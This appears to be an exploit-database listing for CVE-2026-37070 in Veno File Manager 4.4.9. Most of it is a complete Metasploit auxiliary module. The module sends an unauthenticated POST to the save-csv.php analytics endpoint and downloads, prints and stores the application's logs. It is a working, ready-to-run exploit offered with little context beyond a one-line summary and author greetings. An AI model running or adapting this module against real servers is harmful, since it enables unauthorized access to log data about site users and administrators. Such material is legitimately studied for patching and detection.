Exploit for 📄 Veno File Manager 4.4.9 Log Disclosure CVE-2026-37070

Name: Exploit for 📄 Veno File Manager 4.4.9 Log Disclosure CVE-2026-37070
Rating: 5 (4 reviews)
2026-06-19 | CVSS 5.9
## https://sploitus.com/exploit?id=PACKETSTORM:223853
==================================================================================================================================
    | # Title     : Veno File Manager 4.4.9 Unauthenticated Logs Download                                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://veno.es/updates/logs/?slug=vfm/                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This module allows unauthenticated attackers to download application logs from Veno File Manager 4.4.9 by exploiting the save-csv.php endpoint.
    
    [+] POc        :  
    
    ##
    # Module for Unauthenticated Logs Download
    ##
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Veno File Manager 4.4.9 - Unauthenticated Logs Download',
            'Description' => %q{
              This module allows unauthenticated attackers to download application logs
              from Veno File Manager 4.4.9 by exploiting the save-csv.php endpoint.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-37070'],
              ['URL', 'https://github.com/jfs-jfs/CVE-2026-37070']
            ]
          )
        )
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path', '/']),
          OptString.new('START_DATE', [true, 'Start date (YYYY-MM-DD)', '2024-01-01'])
        ])
      end
    
      def run
        print_status("Downloading logs from #{datastore['START_DATE']}")
        target_url = normalize_uri(target_uri.path, 'vfm-admin', 'admin-panel', 'view', 'analytics', 'save-csv.php')
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => target_url,
          'vars_post' => {
            'logsince' => datastore['START_DATE'],
            'loguntil' => '3000-12-31'
          }
        })
        if res && res.code == 200 && !res.body.empty?
          print_good("Logs downloaded successfully!")
          print_line(res.body)
          store_loot(
            'vfm.logs',
            'text/csv',
            rhost,
            res.body,
            "vfm_logs_#{datastore['START_DATE']}.csv",
            "VFM Logs from #{datastore['START_DATE']}"
          )
        else
          print_error("Failed to download logs")
        end
      end
    end
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================